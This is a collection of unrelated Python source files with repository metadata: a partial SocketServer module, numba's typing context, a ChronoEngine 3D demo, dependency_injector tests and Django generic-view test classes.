another thread.
"""
self.__is_shut_down.clear()
try:
while not self.__shutdown_request:
# XXX: Consider using another file descriptor or
# connecting to the socket to wake this up instead of
# polling. Polling reduces our responsiveness to a
# shutdown request and wastes cpu at all other times.
r, w, e = select.select([self], [], [], poll_interval)
if self in r:
self._handle_request_noblock()
finally:
self.__shutdown_request = False
self.__is_shut_down.set()
def shutdown(self):
"""Stops the serve_forever loop.
Blocks until the loop has finished. This must be called while
serve_forever() is running in another thread, or it will
deadlock.
"""
self.__shutdown_request = True
self.__is_shut_down.wait()
# The distinction between handling, getting, processing and
# finishing a request is fairly arbitrary. Remember:
#
# - handle_request() is the top-level call. It calls
# select, get_request(), verify_request() and process_request()
# - get_request() is different for stream or datagram sockets
# - process_request() is the place that may fork a new process
# or create a new thread to finish the request
# - finish_request() instantiates the request handler class;
# this constructor will handle the request all by itself
def handle_request(self):
"""Handle one request, possibly blocking.
Respects self.timeout.
"""
# Support people who used socket.settimeout() to escape
# handle_request before self.timeout was available.
timeout = self.socket.gettimeout()
if timeout is None:
timeout = self.timeout
elif self.timeout is not None:
timeout = min(timeout, self.timeout)
fd_sets = select.select([self], [], [], timeout)
if not fd_sets[0]:
self.handle_timeout()
return
self._handle_request_noblock()
def _handle_request_noblock(self):
"""Handle one request, without blocking.
I assume that select.select has returned that the socket is
readable before this function was called, so there should be
no risk of blocking in get_request().
"""
try:
request, client_address = self.get_request()
except socket.error:
return
if self.verify_request(request, client_address):
try:
self.process_request(request, client_address)
except:
self.handle_error(request, client_address)
self.shutdown_request(request)
def handle_timeout(self):
"""Called if no new request arrives within self.timeout.
Overridden by ForkingMixIn.
"""
pass
def verify_request(self, request, client_address):
"""Verify the request. May be overridden.
Return True if we should proceed with this request.
"""
return True
def process_request(self, request, client_address):
"""Call finish_request.
Overridden by ForkingMixIn and ThreadingMixIn.
"""
self.finish_request(request, client_address)
self.shutdown_request(request)
def server_close(self):
"""Called to clean-up the server.
May be overridden.
"""
pass
def finish_request(self, request, client_address):
"""Finish one request by instantiating RequestHandlerClass."""
self.RequestHandlerClass(request, client_address, self)
def shutdown_request(self, request):
"""Called to shutdown and close an individual request."""
self.close_request(request)
def close_request(self, request):
"""Called to clean up an individual request."""
pass
def handle_error(self, request, client_address):
"""Handle an error gracefully. May be overridden.
The default is to print a traceback and continue.
"""
print '-'*40
print 'Exception happened during processing of request from',
print client_address
import traceback
traceback.print_exc() # XXX But this goes to stderr!
print '-'*40
class TCPServer(BaseServer):
"""Base class for various socket-based server classes.
Defaults to synchronous IP stream (i.e., TCP).
Methods for the caller:
- __init__(server_address, RequestHandlerClass, bind_and_activate=True)
- serve_forever(poll_interval=0.5)
- shutdown()
- handle_request() # if you don't use serve_forever()
- fileno() -> int # for select()
Methods that may be overridden:
- server_bind()
- server_activate()
- get_request() -> request, client_address
- handle_timeout()
- verify_request(request, client_address)
- process_request(request, client_address)
- shutdown_request(request)
- close_request(request)
- handle_error()
Methods for derived classes:
- finish_request(request, client_address)
Class variables that may be overridden by derived classes or
instances:
- timeout
- address_family
- socket_type
- request_queue_size (only for stream sockets)
- allow_reuse_address
Instance variables:
- server_address
- RequestHandlerClass
- socket
"""
address_family = socket.AF_INET
socket_type = socket.SOCK_STREAM
request_queue_size = 5
allow_reuse_address = False
def __init__(self, server_address, RequestHandlerClass, bind_and_activate=True):
"""Constructor. May be extended, do not override."""
BaseServer.__init__(self, server_address, RequestHandlerClass)
self.socket = socket.socket(self.address_family,
self.socket_type)
if bind_and_activate:
self.server_bind()
self.server_activate()
def server_bind(self):
"""Called by constructor to bind the socket.
May be overridden.
"""
if self.allow_reuse_address:
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(self.server_address)
self.server_address = self.socket.getsockname()
def server_activate(self):
"""Called by constructor to activate the server.
May be overridden.
"""
self.socket.listen(self.request_queue_size)
def server_close(self):
"""Called to clean-up the server.
May be overridden.
"""
self.socket.close()
def fileno(self):
"""Return socket file number.
Interface required by select().
"""
return self.socket.fileno()
def get_request(self):
"""Get the request and client address from the socket.
May be overridden.
"""
return self.socket.accept()
def shutdown_request(self, request):
"""Called to shutdown and close an individual request."""
try:
#explicitly shutdown. socket.close() merely releases
#the socket and waits for GC to perform the actual close.
request.shutdown(socket.SHUT_WR)
except socket.error:
pass #some platforms may raise ENOTCONN here
self.close_request(request)
def close_request(self, request):
"""Called to clean up an individual request."""
request.close()
class UDPServer(TCPServer):
"""UDP server class."""
allow_reuse_address = False
socket_type = socket.SOCK_DGRAM
max_packet_size = 8192
def get_request(self):
data, client_addr = self.socket.recvfrom(self.max_packet_size)
return (data, self.socket), client_addr
def server_activate(self):
# No need to call listen() for UDP.
pass
def shutdown_request(self, request):
# No need to shutdown anything.
self.close_request(request)
def close_request(self, request):
# No need to close anything.
pass
class ForkingMixIn:
"""Mix-in class to handle each request in a new process."""
timeout = 300
active_children = None
max_children = 40
def collect_children(self):
"""Internal routine to wait for children that have exited."""
if self.active_children is None: return
while len(self.active_children) >= self.max_children:
# XXX: This will wait for any child process, not just ones
# spawned by this library. This could confuse other
# libraries that expect to be able to wait for their own
# children.
try:
pid, status = os.waitpid(0, 0)
except os.error:
pid = None
if pid not in self.active_children: continue
self.active_children.remove(pid)
# XXX: This loop runs more system calls than it ought
# to. There should be a way to put the active_children into a
# process group and then use os.waitpid(-pgid) to wait for any
# of that set, but I couldn't find a way to allocate pgids
# that couldn't collide.
for child in self.active_children:
try:
pid, status = os.waitpid(child, os.WNOHANG)
except os.error:
pid = None
if not pid: continue
try:
self.active_children.remove(pid)
except ValueError, e:
raise ValueError('%s. x=%d and list=%r' % (e.message, pid,
self.active_children))
def handle_timeout(self):
"""Wait for zombies after self.timeout seconds of inactivity.
May be extended, do not override.
"""
self.collect_children()
def process_request(self, request, client_address):
"""Fork a new subprocess to process the request."""
self.collect_children()
pid = os.fork()
if pid:
# Parent process
if self.active_children is None:
self.active_children = []
self.active_children.append(pid)
self.close_request(request) #close handle in parent process
return
else:
# Child process.
# This must never return, hence os._exit()!
try:
self.finish_request(request, client_address)
self.shutdown_request(request)
os._exit(0)
except:
try:
self.handle_error(request, client_address)
self.shutdown_request(request)
finally:
os._exit(1)
class ThreadingMixIn:
"""Mix-in class to handle each request in a new thread."""
# Decides how threads will act upon termination of the
# main process
daemon_threads = False
def process_request_thread(self, request, client_address):
"""Same as in BaseServer but as a thread.
In addition, exception handling is done here.
"""
try:
self.finish_request(request, client_address)
self.shutdown_request(request)
except:
self.handle_error(request, client_address)
self.shutdown_request(request)
def process_request(self, request, client_address):
"""Start a new thread to process the request."""
t = threading.Thread(target = self.process_request_thread,
args = (request, client_address))
t.daemon = self.daemon_threads
t.start()
class ForkingUDPServer(ForkingMixIn, UDPServer): pass
class ForkingTCPServer(ForkingMixIn, TCPServer): pass
class ThreadingUDPServer(ThreadingMixIn, UDPServer): pass
class ThreadingTCPServer(ThreadingMixIn, TCPServer): pass
if hasattr(socket, 'AF_UNIX'):
class UnixStreamServer(TCPServer):
address_family = socket.AF_UNIX
class UnixDatagramServer(UDPServer):
address_family = socket.AF_UNIX
class ThreadingUnixStreamServer(ThreadingMixIn, UnixStreamServer): pass
class ThreadingUnixDatagramServer(ThreadingMixIn, UnixDatagramServer): pass
class BaseRequestHandler:
"""Base class for request handler classes.
This class is instantiated for each request to be handled. The
constructor sets the instance variables request, client_address
and server, and then calls the handle() method. To implement a
specific service, all you need to do is to derive a class which
defines a handle() method.
The handle() method can find the request as self.request, the
client address as self.client_address, and the server (in case it
needs access to per-server information) as self.server. Since a
separate instance is created for each request, the handle() method
can define arbitrary other instance variariables.
"""
def __init__(self, request, client_address, server):
self.request = request
self.client_address = client_address
self.server = server
self.setup()
try:
self.handle()
finally:
self.finish()
def setup(self):
pass
def handle(self):
pass
def finish(self):
pass
# The following two classes make it possible to use the same service
# class for stream or datagram servers.
# Each class sets up these instance variables:
# - rfile: a file object from which receives the request is read
# - wfile: a file object to which the reply is written
# When the handle() method returns, wfile is flushed properly
class StreamRequestHandler(BaseRequestHandler):
"""Define self.rfile and self.wfile for stream sockets."""
# Default buffer sizes for rfile, wfile.
# We default rfile to buffered because otherwise it could be
# really slow for large data (a getc() call per byte); we make
# wfile unbuffered because (a) often after a write() we want to
# read and we need to flush the line; (b) big writes to unbuffered
# files are typically optimized by stdio even when big reads
# aren't.
rbufsize = -1
wbufsize = 0
# A timeout to apply to the request socket, if not None.
timeout = None
# Disable nagle algorithm for this socket, if True.
# Use only when wbufsize != 0, to avoid small packets.
disable_nagle_algorithm = False
def setup(self):
self.connection = self.request
if self.timeout is not None:
self.connection.settimeout(self.timeout)
if self.disable_nagle_algorithm:
self.connection.setsockopt(socket.IPPROTO_TCP,
socket.TCP_NODELAY, True)
self.rfile = self.connection.makefile('rb', self.rbufsize)
self.wfile = self.connection.makefile('wb', self.wbufsize)
def finish(self):
if not self.wfile.closed:
self.wfile.flush()
self.wfile.close()
self.rfile.close()
class DatagramRequestHandler(BaseRequestHandler):
# XXX Regrettably, I cannot get this working on Linux;
# s.recvfrom() doesn't return a meaningful client address.
"""Define self.rfile and self.wfile for datagram sockets."""
def setup(self):
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
self.packet, self.socket = self.request
self.rfile = StringIO(self.packet)
self.wfile = StringIO()
def finish(self):
self.socket.sendto(self.wfile.getvalue(), self.client_address)
|
akiokio/centralfitestoque
|
src/.pycharm_helpers/pydev/_pydev_SocketServer.py
|
Python
|
bsd-2-clause
| 23,375
|
from collections import defaultdict
from collections.abc import Sequence
import types as pytypes
import weakref
import threading
import contextlib
import operator
import numba
from numba.core import types, errors
from numba.core.typeconv import Conversion, rules
from numba.core.typing import templates
from numba.core.utils import order_by_target_specificity
from .typeof import typeof, Purpose
from numba.core import utils
class Rating(object):
__slots__ = 'promote', 'safe_convert', "unsafe_convert"
def __init__(self):
self.promote = 0
self.safe_convert = 0
self.unsafe_convert = 0
def astuple(self):
"""Returns a tuple suitable for comparing with the worse situation
start first.
"""
return (self.unsafe_convert, self.safe_convert, self.promote)
def __add__(self, other):
if type(self) is not type(other):
return NotImplemented
rsum = Rating()
rsum.promote = self.promote + other.promote
rsum.safe_convert = self.safe_convert + other.safe_convert
rsum.unsafe_convert = self.unsafe_convert + other.unsafe_convert
return rsum
class CallStack(Sequence):
"""
A compile-time call stack
"""
def __init__(self):
self._stack = []
self._lock = threading.RLock()
def __getitem__(self, index):
"""
Returns item in the stack where index=0 is the top and index=1 is
the second item from the top.
"""
return self._stack[len(self) - index - 1]
def __len__(self):
return len(self._stack)
@contextlib.contextmanager
def register(self, target, typeinfer, func_id, args):
# guard compiling the same function with the same signature
if self.match(func_id.func, args):
msg = "compiler re-entrant to the same function signature"
raise errors.NumbaRuntimeError(msg)
self._lock.acquire()
self._stack.append(CallFrame(target, typeinfer, func_id, args))
try:
yield
finally:
self._stack.pop()
self._lock.release()
def finditer(self, py_func):
"""
Yields frame that matches the function object starting from the top
of stack.
"""
for frame in self:
if frame.func_id.func is py_func:
yield frame
def findfirst(self, py_func):
"""
Returns the first result from `.finditer(py_func)`; or None if no match.
"""
try:
return next(self.finditer(py_func))
except StopIteration:
return
def match(self, py_func, args):
"""
Returns first function that matches *py_func* and the arguments types in
*args*; or, None if no match.
"""
for frame in self.finditer(py_func):
if frame.args == args:
return frame
class CallFrame(object):
"""
A compile-time call frame
"""
def __init__(self, target, typeinfer, func_id, args):
self.typeinfer = typeinfer
self.func_id = func_id
self.args = args
self.target = target
self._inferred_retty = set()
def __repr__(self):
return "CallFrame({}, {})".format(self.func_id, self.args)
def add_return_type(self, return_type):
"""Add *return_type* to the list of inferred return-types.
If there are too many, raise `TypingError`.
"""
# The maximum limit is picked arbitrarily.
# Don't think that this needs to be user configurable.
RETTY_LIMIT = 16
self._inferred_retty.add(return_type)
if len(self._inferred_retty) >= RETTY_LIMIT:
m = "Return type of recursive function does not converge"
raise errors.TypingError(m)
class BaseContext(object):
"""A typing context for storing function typing constrain template.
"""
def __init__(self):
# A list of installed registries
self._registries = {}
# Typing declarations extracted from the registries or other sources
self._functions = defaultdict(list)
self._attributes = defaultdict(list)
self._globals = utils.UniqueDict()
self.tm = rules.default_type_manager
self.callstack = CallStack()
# Initialize
self.init()
def init(self):
"""
Initialize the typing context. Can be overridden by subclasses.
"""
def refresh(self):
"""
Refresh context with new declarations from known registries.
Useful for third-party extensions.
"""
self.load_additional_registries()
# Some extensions may have augmented the builtin registry
self._load_builtins()
def explain_function_type(self, func):
"""
Returns a string description of the type of a function
"""
desc = []
defns = []
param = False
if isinstance(func, types.Callable):
sigs, param = func.get_call_signatures()
defns.extend(sigs)
elif func in self._functions:
for tpl in self._functions[func]:
param = param or hasattr(tpl, 'generic')
defns.extend(getattr(tpl, 'cases', []))
else:
msg = "No type info available for {func!r} as a callable."
desc.append(msg.format(func=func))
if defns:
desc = ['Known signatures:']
for sig in defns:
desc.append(' * {0}'.format(sig))
return '\n'.join(desc)
def resolve_function_type(self, func, args, kws):
"""
Resolve function type *func* for argument types *args* and *kws*.
A signature is returned.
"""
# Prefer user definition first
try:
res = self._resolve_user_function_type(func, args, kws)
except errors.TypingError as e:
# Capture any typing error
last_exception = e
res = None
else:
last_exception = None
# Return early we know there's a working user function
if res is not None:
return res
# Check builtin functions
res = self._resolve_builtin_function_type(func, args, kws)
# Re-raise last_exception if no function type has been found
if res is None and last_exception is not None:
raise last_exception
return res
def _resolve_builtin_function_type(self, func, args, kws):
# NOTE: we should reduce usage of this
if func in self._functions:
# Note: Duplicating code with types.Function.get_call_type().
# *defns* are CallTemplates.
defns = self._functions[func]
for defn in defns:
for support_literals in [True, False]:
if support_literals:
res = defn.apply(args, kws)
else:
fixedargs = [types.unliteral(a) for a in args]
res = defn.apply(fixedargs, kws)
if res is not None:
return res
def _resolve_user_function_type(self, func, args, kws, literals=None):
# It's not a known function type, perhaps it's a global?
functy = self._lookup_global(func)
if functy is not None:
func = functy
if isinstance(func, types.Type):
# If it's a type, it may support a __call__ method
func_type = self.resolve_getattr(func, "__call__")
if func_type is not None:
# The function has a __call__ method, type its call.
return self.resolve_function_type(func_type, args, kws)
if isinstance(func, types.Callable):
# XXX fold this into the __call__ attribute logic?
return func.get_call_type(self, args, kws)
def _get_attribute_templates(self, typ):
"""
Get matching AttributeTemplates for the Numba type.
"""
if typ in self._attributes:
for attrinfo in self._attributes[typ]:
yield attrinfo
else:
for cls in type(typ).__mro__:
if cls in self._attributes:
for attrinfo in self._attributes[cls]:
yield attrinfo
def resolve_getattr(self, typ, attr):
"""
Resolve getting the attribute *attr* (a string) on the Numba type.
The attribute's type is returned, or None if resolution failed.
"""
def core(typ):
out = self.find_matching_getattr_template(typ, attr)
if out:
return out['return_type']
out = core(typ)
if out is not None:
return out
# Try again without literals
out = core(types.unliteral(typ))
if out is not None:
return out
if isinstance(typ, types.Module):
attrty = self.resolve_module_constants(typ, attr)
if attrty is not None:
return attrty
def find_matching_getattr_template(self, typ, attr):
templates = list(self._get_attribute_templates(typ))
# get the order in which to try templates
from numba.core.target_extension import get_local_target # circular
target_hw = get_local_target(self)
order = order_by_target_specificity(target_hw, templates, fnkey=attr)
for template in order:
return_type = template.resolve(typ, attr)
if return_type is not None:
return {
'template': template,
'return_type': return_type,
}
def resolve_setattr(self, target, attr, value):
"""
Resolve setting the attribute *attr* (a string) on the *target* type
to the given *value* type.
A function signature is returned, or None if resolution failed.
"""
for attrinfo in self._get_attribute_templates(target):
expectedty = attrinfo.resolve(target, attr)
# NOTE: convertibility from *value* to *expectedty* is left to
# the caller.
if expectedty is not None:
return templates.signature(types.void, target, expectedty)
def resolve_static_getitem(self, value, index):
assert not isinstance(index, types.Type), index
args = value, index
kws = ()
return self.resolve_function_type("static_getitem", args, kws)
def resolve_static_setitem(self, target, index, value):
assert not isinstance(index, types.Type), index
args = target, index, value
kws = {}
return self.resolve_function_type("static_setitem", args, kws)
def resolve_setitem(self, target, index, value):
assert isinstance(index, types.Type), index
fnty = self.resolve_value_type(operator.setitem)
sig = fnty.get_call_type(self, (target, index, value), {})
return sig
def resolve_delitem(self, target, index):
args = target, index
kws = {}
fnty = self.resolve_value_type(operator.delitem)
sig = fnty.get_call_type(self, args, kws)
return sig
def resolve_module_constants(self, typ, attr):
"""
Resolve module-level global constants.
Return None or the attribute type
"""
assert isinstance(typ, types.Module)
attrval = getattr(typ.pymod, attr)
try:
return self.resolve_value_type(attrval)
except ValueError:
pass
def resolve_argument_type(self, val):
"""
Return the numba type of a Python value that is being used
as a function argument. Integer types will all be considered
int64, regardless of size.
ValueError is raised for unsupported types.
"""
try:
return typeof(val, Purpose.argument)
except ValueError:
if numba.cuda.is_cuda_array(val):
# There's no need to synchronize on a stream when we're only
# determining typing - synchronization happens at launch time,
# so eliding sync here is safe.
return typeof(numba.cuda.as_cuda_array(val, sync=False),
Purpose.argument)
else:
raise
def resolve_value_type(self, val):
"""
Return the numba type of a Python value that is being used
as a runtime constant.
ValueError is raised for unsupported types.
"""
try:
ty = typeof(val, Purpose.constant)
except ValueError as e:
# Make sure the exception doesn't hold a reference to the user
# value.
typeof_exc = utils.erase_traceback(e)
else:
return ty
if isinstance(val, types.ExternalFunction):
return val
# Try to look up target specific typing information
ty = self._get_global_type(val)
if ty is not None:
return ty
raise typeof_exc
def resolve_value_type_prefer_literal(self, value):
"""Resolve value type and prefer Literal types whenever possible.
"""
lit = types.maybe_literal(value)
if lit is None:
return self.resolve_value_type(value)
else:
return lit
def _get_global_type(self, gv):
ty = self._lookup_global(gv)
if ty is not None:
return ty
if isinstance(gv, pytypes.ModuleType):
return types.Module(gv)
def _load_builtins(self):
# Initialize declarations
from numba.core.typing import builtins, arraydecl, npdatetime # noqa: F401, E501
from numba.core.typing import ctypes_utils, bufproto # noqa: F401, E501
from numba.core.unsafe import eh # noqa: F401
self.install_registry(templates.builtin_registry)
def load_additional_registries(self):
"""
Load target-specific registries. Can be overridden by subclasses.
"""
def install_registry(self, registry):
"""
Install a *registry* (a templates.Registry instance) of function,
attribute and global declarations.
"""
try:
loader = self._registries[registry]
except KeyError:
loader = templates.RegistryLoader(registry)
self._registries[registry] = loader
for ftcls in loader.new_registrations('functions'):
self.insert_function(ftcls(self))
for ftcls in loader.new_registrations('attributes'):
self.insert_attributes(ftcls(self))
for gv, gty in loader.new_registrations('globals'):
existing = self._lookup_global(gv)
if existing is None:
self.insert_global(gv, gty)
else:
# A type was already inserted, see if we can add to it
newty = existing.augment(gty)
if newty is None:
raise TypeError("cannot augment %s with %s"
% (existing, gty))
self._remove_global(gv)
self._insert_global(gv, newty)
def _lookup_global(self, gv):
"""
Look up the registered type for global value *gv*.
"""
try:
gv = weakref.ref(gv)
except TypeError:
pass
try:
return self._globals.get(gv, None)
except TypeError:
# Unhashable type
return None
def _insert_global(self, gv, gty):
"""
Register type *gty* for value *gv*. Only a weak reference
to *gv* is kept, if possible.
"""
def on_disposal(wr, pop=self._globals.pop):
# pop() is pre-looked up to avoid a crash late at shutdown on 3.5
# (https://bugs.python.org/issue25217)
pop(wr)
try:
gv = weakref.ref(gv, on_disposal)
except TypeError:
pass
self._globals[gv] = gty
def _remove_global(self, gv):
"""
Remove the registered type for global value *gv*.
"""
try:
gv = weakref.ref(gv)
except TypeError:
pass
del self._globals[gv]
def insert_global(self, gv, gty):
self._insert_global(gv, gty)
def insert_attributes(self, at):
key = at.key
self._attributes[key].append(at)
def insert_function(self, ft):
key = ft.key
self._functions[key].append(ft)
def insert_user_function(self, fn, ft):
"""Insert a user function.
Args
----
- fn:
object used as callee
- ft:
function template
"""
self._insert_global(fn, types.Function(ft))
def can_convert(self, fromty, toty):
"""
Check whether conversion is possible from *fromty* to *toty*.
If successful, return a numba.typeconv.Conversion instance;
otherwise None is returned.
"""
if fromty == toty:
return Conversion.exact
else:
# First check with the type manager (some rules are registered
# at startup there, see numba.typeconv.rules)
conv = self.tm.check_compatible(fromty, toty)
if conv is not None:
return conv
# Fall back on type-specific rules
forward = fromty.can_convert_to(self, toty)
backward = toty.can_convert_from(self, fromty)
if backward is None:
return forward
elif forward is None:
return backward
else:
return min(forward, backward)
def _rate_arguments(self, actualargs, formalargs, unsafe_casting=True,
exact_match_required=False):
"""
Rate the actual arguments for compatibility against the formal
arguments. A Rating instance is returned, or None if incompatible.
"""
if len(actualargs) != len(formalargs):
return None
rate = Rating()
for actual, formal in zip(actualargs, formalargs):
conv = self.can_convert(actual, formal)
if conv is None:
return None
elif not unsafe_casting and conv >= Conversion.unsafe:
return None
elif exact_match_required and conv != Conversion.exact:
return None
if conv == Conversion.promote:
rate.promote += 1
elif conv == Conversion.safe:
rate.safe_convert += 1
elif conv == Conversion.unsafe:
rate.unsafe_convert += 1
elif conv == Conversion.exact:
pass
else:
raise Exception("unreachable", conv)
return rate
def install_possible_conversions(self, actualargs, formalargs):
"""
Install possible conversions from the actual argument types to
the formal argument types in the C++ type manager.
Return True if all arguments can be converted.
"""
if len(actualargs) != len(formalargs):
return False
for actual, formal in zip(actualargs, formalargs):
if self.tm.check_compatible(actual, formal) is not None:
# This conversion is already known
continue
conv = self.can_convert(actual, formal)
if conv is None:
return False
assert conv is not Conversion.exact
self.tm.set_compatible(actual, formal, conv)
return True
def resolve_overload(self, key, cases, args, kws,
allow_ambiguous=True, unsafe_casting=True,
exact_match_required=False):
"""
Given actual *args* and *kws*, find the best matching
signature in *cases*, or None if none matches.
*key* is used for error reporting purposes.
If *allow_ambiguous* is False, a tie in the best matches
will raise an error.
If *unsafe_casting* is False, unsafe casting is forbidden.
"""
assert not kws, "Keyword arguments are not supported, yet"
options = {
'unsafe_casting': unsafe_casting,
'exact_match_required': exact_match_required,
}
# Rate each case
candidates = []
for case in cases:
if len(args) == len(case.args):
rating = self._rate_arguments(args, case.args, **options)
if rating is not None:
candidates.append((rating.astuple(), case))
# Find the best case
candidates.sort(key=lambda i: i[0])
if candidates:
best_rate, best = candidates[0]
if not allow_ambiguous:
# Find whether there is a tie and if so, raise an error
tied = []
for rate, case in candidates:
if rate != best_rate:
break
tied.append(case)
if len(tied) > 1:
args = (key, args, '\n'.join(map(str, tied)))
msg = "Ambiguous overloading for %s %s:\n%s" % args
raise TypeError(msg)
# Simply return the best matching candidate in order.
# If there is a tie, since list.sort() is stable, the first case
# in the original order is returned.
# (this can happen if e.g. a function template exposes
# (int32, int32) -> int32 and (int64, int64) -> int64,
# and you call it with (int16, int16) arguments)
return best
def unify_types(self, *typelist):
# Sort the type list according to bit width before doing
# pairwise unification (with thanks to aterrel).
def keyfunc(obj):
"""Uses bitwidth to order numeric-types.
Fallback to stable, deterministic sort.
"""
return getattr(obj, 'bitwidth', 0)
typelist = sorted(typelist, key=keyfunc)
unified = typelist[0]
for tp in typelist[1:]:
unified = self.unify_pairs(unified, tp)
if unified is None:
break
return unified
def unify_pairs(self, first, second):
"""
Try to unify the two given types. A third type is returned,
or None in case of failure.
"""
if first == second:
return first
if first is types.undefined:
return second
elif second is types.undefined:
return first
# Types with special unification rules
unified = first.unify(self, second)
if unified is not None:
return unified
unified = second.unify(self, first)
if unified is not None:
return unified
# Other types with simple conversion rules
conv = self.can_convert(fromty=first, toty=second)
if conv is not None and conv <= Conversion.safe:
# Can convert from first to second
return second
conv = self.can_convert(fromty=second, toty=first)
if conv is not None and conv <= Conversion.safe:
# Can convert from second to first
return first
if isinstance(first, types.Literal) or \
isinstance(second, types.Literal):
first = types.unliteral(first)
second = types.unliteral(second)
return self.unify_pairs(first, second)
# Cannot unify
return None
class Context(BaseContext):
def load_additional_registries(self):
from . import (
cffi_utils,
cmathdecl,
enumdecl,
listdecl,
mathdecl,
npydecl,
randomdecl,
setdecl,
dictdecl,
)
self.install_registry(cffi_utils.registry)
self.install_registry(cmathdecl.registry)
self.install_registry(enumdecl.registry)
self.install_registry(listdecl.registry)
self.install_registry(mathdecl.registry)
self.install_registry(npydecl.registry)
self.install_registry(randomdecl.registry)
self.install_registry(setdecl.registry)
self.install_registry(dictdecl.registry)
|
seibert/numba
|
numba/core/typing/context.py
|
Python
|
bsd-2-clause
| 24,612
|
#-------------------------------------------------------------------------------
# Name: modulo1
# Purpose:
#
# Author: tasora
#
# Created: 14/02/2012
# Copyright: (c) tasora 2012
# Licence: <your licence>
#-------------------------------------------------------------------------------
#!/usr/bin/env python
def main():
pass
if __name__ == '__main__':
main()
import os
import math
import ChronoEngine_PYTHON_core as chrono
import ChronoEngine_PYTHON_postprocess as postprocess
import ChronoEngine_PYTHON_irrlicht as chronoirr
print ("Example: create a system and visualize it in realtime 3D");
# ---------------------------------------------------------------------
#
# Create the simulation system and add items
#
mysystem = chrono.ChSystem()
# Create a fixed rigid body
mbody1 = chrono.ChBodyShared()
mbody1.SetBodyFixed(True)
mbody1.SetPos( chrono.ChVectorD(0,0,-0.2))
mysystem.Add(mbody1)
mboxasset = chrono.ChBoxShapeShared()
mboxasset.GetBoxGeometry().Size = chrono.ChVectorD(0.2,0.5,0.1)
mbody1.AddAsset(mboxasset)
# Create a swinging rigid body
mbody2 = chrono.ChBodyShared()
mbody2.SetBodyFixed(False)
mysystem.Add(mbody2)
mboxasset = chrono.ChBoxShapeShared()
mboxasset.GetBoxGeometry().Size = chrono.ChVectorD(0.2,0.5,0.1)
mbody2.AddAsset(mboxasset)
mboxtexture = chrono.ChTextureShared()
mboxtexture.SetTextureFilename('../data/concrete.jpg')
mbody2.GetAssets().push_back(mboxtexture)
# Create a revolute constraint
mlink = chrono.ChLinkRevoluteShared()
# the coordinate system of the constraint reference in abs. space:
mframe = chrono.ChFrameD(chrono.ChVectorD(0.1,0.5,0))
# initialize the constraint telling which part must be connected, and where:
mlink.Initialize(mbody1,mbody2, mframe)
mysystem.Add(mlink)
# ---------------------------------------------------------------------
#
# Create an Irrlicht application to visualize the system
#
myapplication = chronoirr.ChIrrApp(mysystem)
myapplication.AddTypicalSky('../data/skybox/')
myapplication.AddTypicalCamera(chronoirr.vector3df(0.6,0.6,0.8))
myapplication.AddTypicalLights()
# ==IMPORTANT!== Use this function for adding a ChIrrNodeAsset to all items
# in the system. These ChIrrNodeAsset assets are 'proxies' to the Irrlicht meshes.
# If you need a finer control on which item really needs a visualization proxy in
# Irrlicht, just use application.AssetBind(myitem); on a per-item basis.
myapplication.AssetBindAll();
# ==IMPORTANT!== Use this function for 'converting' into Irrlicht meshes the assets
# that you added to the bodies into 3D shapes, they can be visualized by Irrlicht!
myapplication.AssetUpdateAll();
# ---------------------------------------------------------------------
#
# Run the simulation
#
myapplication.SetTimestep(0.001)
while(myapplication.GetDevice().run()):
myapplication.BeginScene()
myapplication.DrawAll()
myapplication.DoStep()
myapplication.EndScene()
|
Bryan-Peterson/chrono
|
src/demos/python/demo_irrlicht.py
|
Python
|
bsd-3-clause
| 2,990
|
"""DelegatedCallable provider tests."""
from dependency_injector import providers
from .common import example
def test_inheritance():
assert isinstance(providers.DelegatedCallable(example), providers.Callable)
def test_is_provider():
assert providers.is_provider(providers.DelegatedCallable(example)) is True
def test_is_delegated_provider():
provider = providers.DelegatedCallable(example)
assert providers.is_delegated(provider) is True
def test_repr():
provider = providers.DelegatedCallable(example)
assert repr(provider) == (
"<dependency_injector.providers."
"DelegatedCallable({0}) at {1}>".format(repr(example), hex(id(provider)))
)
|
ets-labs/python-dependency-injector
|
tests/unit/providers/callables/test_delegated_callable_py2_py3.py
|
Python
|
bsd-3-clause
| 695
|
from __future__ import unicode_literals
from django.contrib.auth.decorators import login_required
from django.core.paginator import Paginator
from django.core.urlresolvers import reverse, reverse_lazy
from django.utils.decorators import method_decorator
from django.views import generic
from .test_forms import AuthorForm, ContactForm
from .models import Artist, Author, Book, Page, BookSigning
class CustomTemplateView(generic.TemplateView):
template_name = 'generic_views/about.html'
def get_context_data(self, **kwargs):
context = super(CustomTemplateView, self).get_context_data(**kwargs)
context.update({'key': 'value'})
return context
class ObjectDetail(generic.DetailView):
template_name = 'generic_views/detail.html'
def get_object(self):
return {'foo': 'bar'}
class ArtistDetail(generic.DetailView):
queryset = Artist.objects.all()
class AuthorDetail(generic.DetailView):
queryset = Author.objects.all()
class PageDetail(generic.DetailView):
queryset = Page.objects.all()
template_name_field = 'template'
class DictList(generic.ListView):
"""A ListView that doesn't use a model."""
queryset = [
{'first': 'John', 'last': 'Lennon'},
{'first': 'Yoko', 'last': 'Ono'}
]
template_name = 'generic_views/list.html'
class ArtistList(generic.ListView):
template_name = 'generic_views/list.html'
queryset = Artist.objects.all()
class AuthorList(generic.ListView):
queryset = Author.objects.all()
class CustomPaginator(Paginator):
def __init__(self, queryset, page_size, orphans=0, allow_empty_first_page=True):
super(CustomPaginator, self).__init__(
queryset,
page_size,
orphans=2,
allow_empty_first_page=allow_empty_first_page)
class AuthorListCustomPaginator(AuthorList):
paginate_by = 5
def get_paginator(self, queryset, page_size, orphans=0, allow_empty_first_page=True):
return super(AuthorListCustomPaginator, self).get_paginator(
queryset,
page_size,
orphans=2,
allow_empty_first_page=allow_empty_first_page)
class ContactView(generic.FormView):
form_class = ContactForm
success_url = reverse_lazy('authors_list')
template_name = 'generic_views/form.html'
class ArtistCreate(generic.CreateView):
model = Artist
fields = '__all__'
class NaiveAuthorCreate(generic.CreateView):
queryset = Author.objects.all()
fields = '__all__'
class TemplateResponseWithoutTemplate(generic.detail.SingleObjectTemplateResponseMixin, generic.View):
# we don't define the usual template_name here
def __init__(self):
# Dummy object, but attr is required by get_template_name()
self.object = None
class AuthorCreate(generic.CreateView):
model = Author
success_url = '/list/authors/'
fields = '__all__'
class SpecializedAuthorCreate(generic.CreateView):
model = Author
form_class = AuthorForm
template_name = 'generic_views/form.html'
context_object_name = 'thingy'
def get_success_url(self):
return reverse('author_detail', args=[self.object.id,])
